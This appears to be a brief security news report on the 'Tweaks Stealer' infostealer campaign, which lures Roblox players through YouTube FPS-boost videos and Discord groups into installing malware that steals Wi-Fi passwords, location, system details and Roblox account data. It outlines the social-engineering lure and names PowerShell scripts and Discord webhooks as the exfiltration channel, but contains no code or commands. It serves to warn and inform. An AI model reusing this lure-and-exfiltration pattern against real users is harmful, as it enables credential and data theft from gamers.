A new malicious campaign has emerged, bearing the name “Tweaks Stealer”, with its primary target being the extensive user base of the popular online gaming platform, Roblox. This insidious campaign employs deceptive tactics to distribute infostealer malware, emphasizing its ability to exploit users’ security and compromise their sensitive information, making it a matter of critical concern. The attackers have strategically leveraged the widespread usage of platforms like YouTube and Discord to reach their victims, effectively bypassing traditional web filters that typically block known malicious servers, increasing the campaign’s threat severity.
The campaign lures users by exploiting the desire for an enhanced gaming experience through improved Frames Per Second (FPS), a highly sought-after feature in the gaming community. Attackers have carefully designed deceptive strategies, such as creating YouTube videos that guide users on increasing their FPS in Roblox while directing them to Discord groups controlled by the attackers. These groups present free and paid versions of the supposed optimization files, disguising the infostealer malware and leading unsuspecting users into unwittingly installing the Tweaks malware, significantly compromising their systems’ security.
The Tweaks malware, also known as Tweaker, exhibits a dual functionality, allowing it to operate in the background to steal sensitive data while ostensibly promising a better gaming experience. This deceptive approach minimizes the likelihood of users raising suspicion, emphasizing the need for heightened vigilance. The malware’s technical breakdown reveals its capability to steal a wide range of critical data, such as Wi-Fi profiles and passwords, user location, system information, Roblox IDs, and in-game currency details. Furthermore, it employs sophisticated techniques, including PowerShell-based scripts and Discord webhooks, to exfiltrate the stolen data to attacker-controlled servers, highlighting the advanced nature of this cyber threat.
